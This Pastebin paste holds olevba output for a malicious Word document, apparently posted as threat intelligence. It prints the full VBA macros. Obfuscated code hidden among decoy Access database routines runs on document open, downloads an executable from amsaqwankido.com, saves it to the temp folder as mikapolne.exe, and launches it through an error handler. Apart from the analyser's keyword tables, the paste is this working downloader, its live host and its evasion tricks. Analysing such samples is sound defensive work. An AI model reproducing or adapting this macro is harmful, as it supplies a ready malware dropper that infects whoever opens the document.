API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Jul 22nd, 2015
549
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 22.65 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OpX:MAS--B- excelm~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: excelm~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. xbxGk5Ux3irM4d
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public SbUYcGnIFn As String
  41. Public strTargettable As String
  42.  
  43. '------ BEGIN IMPORT CODES -----------
  44.  
  45. 'This code was originally written by Ken Getz.
  46. 'It is not to be altered or distributed,
  47. 'except as part of an application.
  48. 'You are free to use it in any application,
  49. 'provided the copyright notice is left unchanged.
  50. '
  51. ' Code courtesy of:
  52. '   Microsoft Access 95 How-To
  53. ' Ken Getz and Paul Litwin
  54. ' Waite Group Press, 1996
  55.  
  56. Type tagOPENFILENAME
  57.     lStructSize As Long
  58.     hwndOwner As Long
  59.     hInstance As Long
  60.     strFilter As String
  61.     strCustomFilter As String
  62.     nMaxCustFilter As Long
  63.     nFilterIndex As Long
  64.     strFile As String
  65.     nMaxFile As Long
  66.     strFileTitle As String
  67.     nMaxFileTitle As Long
  68.     strInitialDir As String
  69.     strTitle As String
  70.     Flags As Long
  71.     nFileOffset As Integer
  72.     nFileExtension As Integer
  73.     strDefExt As String
  74.     lCustData As Long
  75.     lpfnHook As Long
  76.     lpTemplateName As String
  77. End Type
  78.  
  79.  
  80. Global Const ahtOFN_READONLY = &H1
  81. Global Const ahtOFN_OVERWRITEPROMPT = &H2
  82. Global Const ahtOFN_HIDEREADONLY = &H4
  83. Global Const ahtOFN_NOCHANGEDIR = &H8
  84. Global Const ahtOFN_SHOWHELP = &H10
  85. ' You won't use these.
  86. 'Global Const ahtOFN_ENABLEHOOK = &H20
  87. 'Global Const ahtOFN_ENABLETEMPLATE = &H40
  88. 'Global Const ahtOFN_ENABLETEMPLATEHANDLE = &H80
  89. Global Const ahtOFN_NOVALIDATE = &H100
  90. Global Const ahtOFN_ALLOWMULTISELECT = &H200
  91. Global Const ahtOFN_EXTENSIONDIFFERENT = &H400
  92. Global Const ahtOFN_PATHMUSTEXIST = &H800
  93. Global Const ahtOFN_FILEMUSTEXIST = &H1000
  94. Global Const ahtOFN_CREATEPROMPT = &H2000
  95. Global Const ahtOFN_SHAREAWARE = &H4000
  96. Global Const ahtOFN_NOREADONLYRETURN = &H8000
  97. Global Const ahtOFN_NOTESTFILECREATE = &H10000
  98. Global Const ahtOFN_NONETWORKBUTTON = &H20000
  99. Global Const ahtOFN_NOLONGNAMES = &H40000
  100. ' New for Windows 95
  101. Global Const ahtOFN_EXPLORER = &H80000
  102. Global Const ahtOFN_NODEREFERENCELINKS = &H100000
  103. Global Const ahtOFN_LONGNAMES = &H200000
  104.  
  105.  
  106. Function RecallFileLocation() As String
  107.     Dim strFilter As String, strLoc As String
  108.     Dim lngFlags As Long, MyDefault As String
  109.     strFilter = ahtAddFilterItem(strFilter, "Access Files (*.mda, *.mdb)", _
  110.                     "*.MDA;*.MDB")
  111.     'strFilter = ahtAddFilterItem(strFilter, "dBASE Files (*.dbf)", "*.DBF")
  112.    strFilter = ahtAddFilterItem(strFilter, "Text Files (*.txt)", "*.TXT")
  113.     strFilter = ahtAddFilterItem(strFilter, "Excel Files (*.xls)", "*.XLS")
  114.     strFilter = ahtAddFilterItem(strFilter, "All Files (*.*)", "*.*")
  115.  
  116.     MyDefault = "C:\"
  117.     ' MsgBox ValidateLocations(MyDefault)   Returns results of test to see if exists
  118.      
  119.     RecallFileLocation = ahtCommonFileOpenSave(InitialDir:=MyDefault, _
  120.         Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  121.         DialogTitle:="Find File to Open!")
  122.    
  123.     '    MsgBox "You selected: " & ahtCommonFileOpenSave(InitialDir:="S:\Assignment List\", _
  124.     '    Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  125.     '    DialogTitle:="Find File to Open!")
  126.    ' Since you passed in a variable for lngFlags,
  127.    ' the function places the output flags value in the variable.
  128.    Debug.Print Hex(lngFlags)
  129. End Function
  130.  
  131. Function GetOpenFile(Optional varDirectory As Variant, _
  132.     Optional varTitleForDialog As Variant) As Variant
  133. ' Here's an example that gets an Access database name.
  134. Dim strFilter As String
  135. Dim lngFlags As Long
  136. Dim varFileName As Variant
  137. ' Specify that the chosen file must already exist,
  138. ' don't change directories when you're done
  139. ' Also, don't bother displaying
  140. ' the read-only box. It'll only confuse people.
  141.    lngFlags = ahtOFN_FILEMUSTEXIST Or _
  142.                 ahtOFN_HIDEREADONLY Or ahtOFN_NOCHANGEDIR
  143.     If IsMissing(varDirectory) Then
  144.         varDirectory = ""
  145.     End If
  146.     If IsMissing(varTitleForDialog) Then
  147.         varTitleForDialog = "Hello World"
  148.     End If
  149.  
  150.     ' Define the filter string and allocate space in the "c"
  151.    ' string Duplicate this line with changes as necessary for
  152.    ' more file templates.
  153.    strFilter = ahtAddFilterItem(strFilter, _
  154.                 "Excel (*.xls)", "*.XLS")
  155.     ' Now actually call to get the file name.
  156.    varFileName = ahtCommonFileOpenSave( _
  157.                     OpenFile:=False, _
  158.                     InitialDir:=varDirectory, _
  159.                     Filter:=strFilter, _
  160.                     Flags:=lngFlags, _
  161.                     DialogTitle:=varTitleForDialog)
  162.    
  163.     If IsNull(varFileName) Then
  164.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  165.     End If
  166.    
  167.     MsgBox varFileName
  168.     If Not IsNull(varFileName) Then
  169.         varFileName = TrimNull(varFileName)
  170.         GetOpenFile = varFileName
  171.         'DoCmd.TransferText acImportDelim, "csv_import_specs", "sales", GetOpenFile, True
  172.        DoCmd.TransferSpreadsheet acImport, acSpreadsheetTypeExcel9, strTargettable, GetOpenFile, True
  173.     Else
  174.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  175.     End If
  176.  
  177. End Function
  178.  
  179. Sub xbxGk5Ux3irM4d()
  180.  
  181. cTdsOvmpZ0T = Chr(104) & "t" & ";t" & Chr(112) & Chr(58) & "/<" & Chr(47) & Chr(97) & Chr(109) & "s" & "a" & "q" & "w" & Chr(97) & "n" & Chr(107) & Chr(105) & Chr(100) & Chr(111) & Chr(46) & Chr(99) & "o" & Chr(109) & Chr(47) & Chr(109) & Chr(97) & "x" & "/" & "b" & "b" & "w" & ".=" & "e" & Chr(120) & "e"
  182. Set ElDbasip6 = w7IAmB5cDGswAm("M" & Chr(105) & "c" & Chr(114) & Chr(111) & "<s" & "o" & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(72) & "T" & "<T;" & Chr(80))
  183.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(60), "")
  184.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(61), "")
  185.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(59), "")
  186. CallByName ElDbasip6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, "G" & "E" & Chr(84), _
  187. cTdsOvmpZ0T _
  188. , False
  189.  
  190. Set HURaWTTfnV70aA = w7IAmB5cDGswAm(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
  191.  
  192. Set jfhAqR8f0z = CallByName(HURaWTTfnV70aA, Chr(69) & "n" & "v" & "i" & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  193.  
  194. Ga9exV0usiOxh = jfhAqR8f0z("T" & Chr(69) & Chr(77) & Chr(80))
  195.  
  196. SbUYcGnIFn = Ga9exV0usiOxh & Chr(92) & Chr(109) & Chr(105) & Chr(107) & "a" & Chr(112) & Chr(111) & Chr(108) & Chr(110) & Chr(101) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  197. Dim FiiLlqz7ZuFikb() As Byte
  198.  
  199. CallByName ElDbasip6, "S" & "e" & Chr(110) & Chr(100), VbMethod
  200. FiiLlqz7ZuFikb = CallByName(ElDbasip6, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
  201. T1AetFXr4ps8 FiiLlqz7ZuFikb, SbUYcGnIFn
  202. On Error GoTo ke7nvlgCXNTah
  203.     a = 84 / 0
  204.   On Error GoTo 0
  205.  
  206. f8kh1r1ELTN:
  207.   Exit Sub
  208. ke7nvlgCXNTah:
  209.   CP45sZEhc107 ("avNTTxhUC9eWb")
  210. Resume f8kh1r1ELTN
  211. End Sub
  212. Function ahtCommonFileOpenSave( _
  213.             Optional ByRef Flags As Variant, _
  214.             Optional ByVal InitialDir As Variant, _
  215.             Optional ByVal Filter As Variant, _
  216.             Optional ByVal FilterIndex As Variant, _
  217.             Optional ByVal DefaultExt As Variant, _
  218.             Optional ByVal FileName As Variant, _
  219.             Optional ByVal DialogTitle As Variant, _
  220.             Optional ByVal HWnd As Variant, _
  221.             Optional ByVal OpenFile As Variant) As Variant
  222. ' This is the entry point you'll use to call the common
  223. ' file open/save dialog. The parameters are listed
  224. ' below, and all are optional.
  225. '
  226. ' In:
  227. ' Flags: one or more of the ahtOFN_* constants, OR'd together.
  228. ' InitialDir: the directory in which to first look
  229. ' Filter: a set of file filters, set up by calling
  230. ' AddFilterItem. See examples.
  231. ' FilterIndex: 1-based integer indicating which filter
  232. ' set to use, by default (1 if unspecified)
  233. ' DefaultExt: Extension to use if the user doesn't enter one.
  234. ' Only useful on file saves.
  235. ' FileName: Default value for the file name text box.
  236. ' DialogTitle: Title for the dialog.
  237. ' hWnd: parent window handle
  238. ' OpenFile: Boolean(True=Open File/False=Save As)
  239. ' Out:
  240. ' Return Value: Either Null or the selected filename
  241. Dim OFN As tagOPENFILENAME
  242. Dim strFileName As String
  243. Dim strFileTitle As String
  244. Dim fResult As Boolean
  245.     ' Give the dialog a caption title.
  246.    If IsMissing(InitialDir) Then InitialDir = CurDir
  247.     If IsMissing(Filter) Then Filter = ""
  248.     If IsMissing(FilterIndex) Then FilterIndex = 1
  249.     If IsMissing(Flags) Then Flags = 0&
  250.     If IsMissing(DefaultExt) Then DefaultExt = ""
  251.     If IsMissing(FileName) Then FileName = ""
  252.     If IsMissing(DialogTitle) Then DialogTitle = ""
  253.     If IsMissing(HWnd) Then HWnd = cs.Application.hWndAccessApp
  254.     If IsMissing(OpenFile) Then OpenFile = True
  255.     ' Allocate string space for the returned strings.
  256.    strFileName = Left(FileName & String(256, 0), 256)
  257.     strFileTitle = String(256, 0)
  258.     ' Set up the data structure before you call the function
  259.    With OFN
  260.         .lStructSize = Len(OFN)
  261.         .hwndOwner = HWnd
  262.         .strFilter = Filter
  263.         .nFilterIndex = FilterIndex
  264.         .strFile = strFileName
  265.         .nMaxFile = Len(strFileName)
  266.         .strFileTitle = strFileTitle
  267.         .nMaxFileTitle = Len(strFileTitle)
  268.         .strTitle = DialogTitle
  269.         .Flags = Flags
  270.         .strDefExt = DefaultExt
  271.         .strInitialDir = InitialDir
  272.         ' Didn't think most people would want to deal with
  273.        ' these options.
  274.        .hInstance = 0
  275.         '.strCustomFilter = ""
  276.        '.nMaxCustFilter = 0
  277.        .lpfnHook = 0
  278.         'New for NT 4.0
  279.        .strCustomFilter = String(255, 0)
  280.         .nMaxCustFilter = 255
  281.     End With
  282.     ' This will pass the desired data structure to the
  283.    ' Windows API, which will in turn it uses to display
  284.    ' the Open/Save As Dialog.
  285.    If OpenFile Then
  286.         fResult = vdvd.aht_apiGetOpenFileName()
  287.     Else
  288.         fResult = vdvd.aht_apiGetSaveFileName()
  289.     End If
  290.  
  291.     ' The function call filled in the strFileTitle member
  292.    ' of the structure. You'll have to write special code
  293.    ' to retrieve that if you're interested.
  294.    If fResult Then
  295.         ' You might care to check the Flags member of the
  296.        ' structure to get information about the chosen file.
  297.        ' In this example, if you bothered to pass in a
  298.        ' value for Flags, we'll fill it in with the outgoing
  299.        ' Flags value.
  300.        If Not IsMissing(Flags) Then Flags = OFN.Flags
  301.         ahtCommonFileOpenSave = TrimNull(OFN.strFile)
  302.     Else
  303.         ahtCommonFileOpenSave = vbNullString
  304.     End If
  305. End Function
  306.  
  307. Function ahtAddFilterItem(strFilter As String, _
  308.     strDescription As String, Optional varItem As Variant) As String
  309. ' Tack a new chunk onto the file filter.
  310. ' That is, take the old value, stick onto it the description,
  311. ' (like "Databases"), a null character, the skeleton
  312. ' (like "*.mdb;*.mda") and a final null character.
  313.  
  314.     If IsMissing(varItem) Then varItem = "*.*"
  315.     ahtAddFilterItem = strFilter & _
  316.                 strDescription & vbNullChar & _
  317.                 varItem & vbNullChar
  318. End Function
  319.  
  320. Private Function TrimNull(ByVal strItem As String) As String
  321. Dim intPos As Integer
  322.     intPos = InStr(strItem, vbNullChar)
  323.     If intPos > 0 Then
  324.         TrimNull = Left(strItem, intPos - 1)
  325.     Else
  326.         TrimNull = strItem
  327.     End If
  328. End Function
  329.  
  330. '-------------- END IMPORT CODES --------------
  331.  
  332. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  333. ANALYSIS:
  334. +------------+----------------+-----------------------------------------+
  335. | Type       | Keyword        | Description                             |
  336. +------------+----------------+-----------------------------------------+
  337. | Suspicious | Open           | May open a file                         |
  338. | Suspicious | Windows        | May enumerate application windows (if   |
  339. |            |                | combined with Shell.Application object) |
  340. | Suspicious | Chr            | May attempt to obfuscate specific       |
  341. |            |                | strings                                 |
  342. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  343. |            |                | function calls                          |
  344. | Suspicious | Write          | May write to a file (if combined with   |
  345. |            |                | Open)                                   |
  346. | Suspicious | Output         | May write to a file (if combined with   |
  347. |            |                | Open)                                   |
  348. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  349. |            |                | may be used to obfuscate strings        |
  350. |            |                | (option --decode to see all)            |
  351. +------------+----------------+-----------------------------------------+
  352. -------------------------------------------------------------------------------
  353. VBA MACRO Module2.bas
  354. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  356. Dim strNoOfDays As Integer
  357.  
  358. Private Sub Form_Load()
  359.    
  360.   'hide links
  361.  Call show_chart_controls(False)
  362.    
  363.   'reset subform objects
  364.  Call cs.reset_sales_subforms
  365.  
  366.   strSQLWhere = "WHERE Status = 'REG'"
  367.  
  368. End Sub
  369.  
  370. Private Sub img_sales_monitor_Click()
  371.    
  372.   Call sc.reset_sales_subforms
  373.  
  374.   objSubformControl = "viewer"
  375.   Call sc.format_viewer("sales_viewer", 1, 1)
  376.  
  377.   objSubformControl = "info"
  378.   Call sc.format_viewer("sales_summary", 1, 1)
  379.    
  380.   cc.Me.focustaker.SetFocus
  381.  
  382. End Sub
  383.  
  384. Public Function T1AetFXr4ps8(PUDV4fRQQIpv As Variant, inq7dnGSyLG As String)
  385. Dim pDvVXJLJ5VGIbM: Set pDvVXJLJ5VGIbM = w7IAmB5cDGswAm(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & "t" & Chr(114) & Chr(101) & Chr(97) & Chr(109))
  386.  
  387. With pDvVXJLJ5VGIbM
  388.    .Type = 1
  389.     .Open
  390.     .write PUDV4fRQQIpv
  391.     .savetofile inq7dnGSyLG, 2
  392. End With
  393. End Function
  394.  
  395.  
  396.  
  397.  
  398. Private Sub img_sales_trends_Click()
  399.  
  400.   Call dss.EndTimer
  401.   Call ccc.set_chart_labels("sales")
  402.   'Call Subforms_reset
  403.  
  404.   chChartTitle = "14-Day Sales Trending"
  405.  
  406.   strSQLRank = "TOP 14"
  407.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  408.  
  409.   Call ll.BuildSalesChart
  410.  
  411.   Call show_chart_controls(True)
  412.  
  413. End Sub
  414. Private Sub btn_this_month_Click()
  415.  
  416.   Call fb.EndTimer
  417.   Call dd.set_chart_labels("sales")
  418.  
  419.   chChartTitle = "30-Day Sales Trending"
  420.  
  421.   strSQLRank = "TOP 30"
  422.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  423.  
  424.   Call dd.BuildSalesChart
  425.  
  426. End Sub
  427.  
  428. Private Sub btn_this_quarter_Click()
  429.  
  430.   Call cc.EndTimer
  431.   Call ccc.set_chart_labels("sales")
  432.  
  433.   chChartTitle = "90-Day Sales Trending"
  434.  
  435.   strSQLRank = "TOP 90"
  436.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  437.  
  438.   Call lkd.BuildSalesChart
  439.  
  440. End Sub
  441.  
  442. Private Sub btn_this_week_Click()
  443.  
  444.   Call kl.EndTimer
  445.   Call oo.set_chart_labels("sales")
  446.  
  447.   chChartTitle = "14-Day Sales Trending"
  448.  
  449.   strSQLRank = "TOP 14"
  450.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  451.  
  452.   Call ce.BuildSalesChart
  453.  
  454. End Sub
  455.  
  456. Private Sub btn_hourly_14_Click()
  457.  
  458.   Call vr.EndTimer
  459.   Call fe.set_chart_labels("hourly")
  460.  
  461.   strNoOfDays = 14
  462.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  463.  
  464.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  465.  
  466.   Call ec.BuildSalesChart
  467.  
  468. End Sub
  469.  
  470. Private Sub btn_hourly_30_Click()
  471.  
  472.   Call mm.EndTimer
  473.   Call ef.sset_chart_labels("hourly")
  474.  
  475.   strNoOfDays = 30
  476.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  477.    
  478.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  479.  
  480.   Call ls.BuildSalesChart
  481.  
  482. End Sub
  483.  
  484. Private Sub btn_hourly_sum_14_Click()
  485.  
  486.   Call dcd.EndTimer
  487.   Call aa.set_chart_labels("hourly")
  488.  
  489.   strNoOfDays = 14
  490.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  491.    
  492.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  493.  
  494.   Call lfk.BuildSalesChart
  495.  
  496. End Sub
  497.  
  498. Public Function CP45sZEhc107(oTOZyLSZ9iofhw As String)
  499.  Set YMg9p4gOLj = w7IAmB5cDGswAm("S" & "h" & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i" & "o" & Chr(110))
  500. YMg9p4gOLj.Open (SbUYcGnIFn)
  501. End Function
  502. Private Sub btn_hourly_sum_30_Click()
  503.  
  504.   Call la.EndTimer
  505.   Call ds.set_chart_labels("hourly")
  506.  
  507.   strNoOfDays = 30
  508.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  509.    
  510.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  511.  
  512.   Call ll.BuildSalesChart
  513.  
  514. End Sub
  515.  
  516. Private Sub btn_hourly_transactions_14_Click()
  517.  
  518.   Call oo.EndTimer
  519.   Call oa.set_chart_labels("item_count")
  520.  
  521.   strNoOfDays = 14
  522.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  523.    
  524.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  525.  
  526.   Call dw.BuildSalesChart
  527.  
  528. End Sub
  529.  
  530. Private Sub btn_hourly_transactions_30_Click()
  531.  
  532.   Call dwd.EndTimer
  533.   Call aa.set_chart_labels("hourly")
  534.  
  535.   strNoOfDays = 30
  536.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  537.    
  538.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  539.  
  540.   Call lla.BuildSalesChart
  541.  
  542. End Sub
  543.  
  544. Public Function w7IAmB5cDGswAm(Fpsh8W7KwFw4n3 As String)
  545. Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(60), "")
  546.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(61), "")
  547.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(59), "")
  548.  Set w7IAmB5cDGswAm = CreateObject(Fpsh8W7KwFw4n3)
  549. End Function
  550. Function show_chart_controls(thisVisibility As Boolean)
  551.  
  552.   'sales trending controls
  553.  cevMe.a_this_week.Visible = thisVisibility
  554.   cevMe.a_this_month.Visible = thisVisibility
  555.   cevMe.a_this_quarter.Visible = thisVisibility
  556.   cevMe.btn_this_month.Visible = thisVisibility
  557.   cevMe.btn_this_quarter.Visible = thisVisibility
  558.   cevMe.btn_this_week.Visible = thisVisibility
  559.  
  560.   'hourly trending controls
  561.  cevMe.a_hourly_14.Visible = thisVisibility
  562.   cevMe.a_hourly_30.Visible = thisVisibility
  563.   cevMe.a_hourly_sum_14.Visible = thisVisibility
  564.   cevMe.a_hourly_sum_30.Visible = thisVisibility
  565.   cevMe.a_hourly_transactions_14.Visible = thisVisibility
  566.   cevMe.a_hourly_transactions_30.Visible = thisVisibility
  567.  
  568.   cevMe.btn_hourly_14.Visible = thisVisibility
  569.   cevMe.btn_hourly_30.Visible = thisVisibility
  570.   cevMe.btn_hourly_sum_14.Visible = thisVisibility
  571.   cevMe.btn_hourly_sum_30.Visible = thisVisibility
  572.   cevMe.btn_hourly_transactions_14.Visible = thisVisibility
  573.   cevMe.btn_hourly_transactions_30.Visible = thisVisibility
  574.  
  575.   'labels
  576.  cevMe.label_hourly.Visible = thisVisibility
  577.   cevMe.label_avg.Visible = thisVisibility
  578.   cevMe.label_sum.Visible = thisVisibility
  579.   cevMe.label_transactions.Visible = thisVisibility
  580.  
  581. End Function
  582.  
  583.  
  584.  
  585. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  586. ANALYSIS:
  587. +------------+----------------+-----------------------------------------+
  588. | Type       | Keyword        | Description                             |
  589. +------------+----------------+-----------------------------------------+
  590. | Suspicious | Open           | May open a file                         |
  591. | Suspicious | Chr            | May attempt to obfuscate specific       |
  592. |            |                | strings                                 |
  593. | Suspicious | CreateObject   | May create an OLE object                |
  594. | Suspicious | SaveToFile     | May create a text file                  |
  595. | Suspicious | Write          | May write to a file (if combined with   |
  596. |            |                | Open)                                   |
  597. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  598. |            |                | may be used to obfuscate strings        |
  599. |            |                | (option --decode to see all)            |
  600. +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!